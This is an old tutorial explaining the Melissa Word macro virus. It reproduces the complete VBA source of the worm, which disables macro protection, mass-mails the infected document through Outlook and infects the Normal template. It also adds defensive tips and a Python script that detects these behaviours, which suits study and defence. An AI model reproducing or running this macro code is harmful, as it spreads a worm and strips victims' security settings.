______________________________________________________________________________
Melissa and other Macro Viruses Explained----By Ankit Fadia
______________________________________________________________________________

http://blacksun.box.sk

Melissa, the deadliest Macro Virus ever to hit the net, is dreaded by people all over the world. I am going to shed some light on how it works, how to protect yourself from Macro Viruses, and lots more.

Let me start by giving a brief history of Melissa's origin. It is believed that Melissa first originated in Western Europe on the alt.sex newsgroup. It has taken the web by storm and is quite deadly.

So How does it Work?

Melissa is a Word Macro Virus. That is, it was written in the Visual Basic Editor which comes along with Office97 or Office2K.

***************
NewBie Note: Run Word or Excel and press Alt + F11 to launch the Visual Basic Editor.
***************

The core of Microsoft's Office suite is a Visual Basic Engine which runs behind the scenes and can be used for advanced Visual Basic coding. The following code was written in this Visual Basic editor.

/--------The Melissa Word Macro Virus Code: Start--------\
Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... 
by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And 
(InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub
\--------The Melissa Word Macro Virus Code: End--------/

Melissa infects Word97 and Word2000 documents. If you receive an email with an attached document that is infected with the Melissa Word Macro, your computer is not infected just by reading the email; Melissa is on your machine only if you open the infected attached Word Document. Once Melissa is on your machine, the macro virus will attempt to start Microsoft Outlook to send copies of the infected document, as an attachment, to 50 people in Outlook's Address Book.

The message sent by this Macro Virus to 50 people from the address book is as follows:

The email Subject reads: Important Message From [username]

Here the Username is the name that you have set as your Nickname, or the name which Outlook puts on all outgoing mail.

The Email Body reads: Here is the document you asked for ... don't show anyone else. ;-)

And this email has the infected document as an attachment. The infected document reportedly contains some passwords to X rated sites.

The Virus is restricted to MS Outlook and MS Exchange and does not trigger such mass mailings on other Mail Platforms like Lotus Notes.

What's worse is that the Virus turns off Office's Macro Protection, leaving the user exposed to future Viruses. It also makes the Tools > Macro command inaccessible, preventing you from checking any Macro that may be present in a Document or a Template.
It also switches off some of Office97 and Office2K's advanced features like Macro Virus Protection, the prompt to SAVE NORMAL template, and the Confirm Conversion at Open. With these options disabled, MS Word 97 does not warn or prompt while saving the NORMAL.DOT or while opening a document with macros in it.

When a user opens or closes an infected document, the virus first checks whether it has done this mass e-mailing before, by checking the registry key "HKEY_CURRENT_USER\Software\Microsoft\Office\" for a value named "Melissa?". If the value "Melissa?" under this key is set to "...by Kwyjibo", then the mass e-mailing has been done previously from the current machine, and the virus will not attempt the mass mailing a second time. If the Virus does not find this registry value, it will carry out the Mass Mailings.

The Macro Virus will send out mass mailings only once from an infected machine, but its effects do not end here: it has a secondary consequence which triggers once every hour. To make it clearer, when the minute of the hour matches the day of the month (for example, at 2.21 pm on May 21st), the Virus pops the following phrase on the screen:

Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.

If a document is opened or saved at this particular time, the above text is inserted in the Document. Although this aspect of the Melissa Virus is harmless, it might be used in the future by some malicious Virus coder to write a deadlier Variant of Melissa.

If the Virus attacks via Word2000, it will modify the Registry setting such that the security level is set to the minimum and the Macro Security Feature is turned off.
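
The behaviours described above (an auto-run entry point, disabled macro protection, Outlook automation, code copied into the Normal template, the registry marker) can be looked for statically in macro source text. The Python triage below is an added example and not part of the original tutorial; the rule names, the triage and verdict functions and both sample macros are constructed for illustration, with patterns taken from the listing quoted above.

```python
import re

# Behaviours the article attributes to Melissa; each pattern comes from a
# statement in the macro listing quoted above. Rule names are hypothetical.
RULES = {
    "auto_exec": [r"\bSub\s+Document_(Open|Close)\s*\("],
    "security_tamper": [
        r"Options\.(VirusProtection|SaveNormalPrompt|ConfirmConversions)\s*=",
        r"\\Word\\Security",
        r"CommandBars\(.+?\)\.Controls\(.+?\)\.Enabled\s*=\s*False",
    ],
    "outlook_automation": [r'CreateObject\(\s*"Outlook\.Application"',
                           r"\.AddressLists\b"],
    "self_replication": [r"NormalTemplate\.VBProject",
                         r"\.CodeModule\.(InsertLines|AddFromString)"],
    "infection_marker": [r"Melissa\?", r"by Kwyjibo"],
}
COMPILED = {k: [re.compile(p, re.I) for p in v] for k, v in RULES.items()}

def triage(source):
    """Map each behaviour to the 1-based line numbers where it is seen."""
    hits = {}
    for no, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("'"):  # whole-line VBA comment
            continue
        for name, patterns in COMPILED.items():
            if any(p.search(line) for p in patterns):
                hits.setdefault(name, []).append(no)
    return hits

def verdict(hits):
    """'high' = auto-run entry point plus at least two other behaviours."""
    others = set(hits) - {"auto_exec"}
    if "auto_exec" in hits and len(others) >= 2:
        return "high"
    return "review" if hits else "clean"

# Constructed samples: isolated statements, not a working macro.
SUSPECT = '''Private Sub Document_Open()
Options.VirusProtection = (1 - 1)
Set ol = CreateObject("Outlook.Application")
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
End Sub'''
BENIGN = '''Private Sub Document_Open()
ActiveDocument.Fields.Update
End Sub'''
if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, verdict(triage(src)), triage(src))
```

The triage works on macro source that has already been extracted from the document as text, for example with olevba from oletools. An auto-run macro on its own only rates "review", since legitimate templates use Document_Open too.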

W97M.Melissa.IJ

If you have ever received an email with the subject 'Pictures', the line 'What's Up' in the body of the message and a Word document as an attachment, then it is likely that your computer is infected by the W97M.Melissa.IJ (Geni) Macro Virus. The virus tries to use Microsoft Outlook to email a copy of the infected document to up to 4 random addresses from the address book. It can also delete system files like io.sys and command.com, making it impossible to boot up your machine.

Just for your info, the person who coded this virus was traced by the authorities with the help of AOL within a week of its first appearance. Later he was bailed out for $100,000.

How do I protect myself from these Macro Viruses?

If you are already infected, then the best thing to do would be to update your Antiviral Software. If you are not already infected, then there are many ways to protect yourself from future infection.

1. Change the attributes of the file Normal.dot to read only. But this foolproof method does not allow you to make modifications to this file if you want to.

2. The other thing you could do is password protect the Normal.dot file. This will ask you for a password every time you want to modify Normal.dot, thus allowing you to make changes to this file whenever you want to.

3. There is yet another way out. Since almost all Word97 Macro Viruses are Visual Basic Applications or VBA code, you can protect yourself from them by locking them out. Just start the Visual Basic Editor by pressing ALT + F11 and select Normal in the Project Explorer. Now select Normal Properties from the Tools menu. Next choose the Protection tab in the Project Properties dialog box and enter a password for the "password to view project properties" option. This locks out the Macro viruses but allows you to modify the Normal.dot file.

Well, that's all for now. I will soon be updating this file, so keep checking.

Ankit Fadia

To receive more tutorials on Hacking and Viruses join my mailing list by sending an email to: Programmingforhackers-subscribe@egroups.com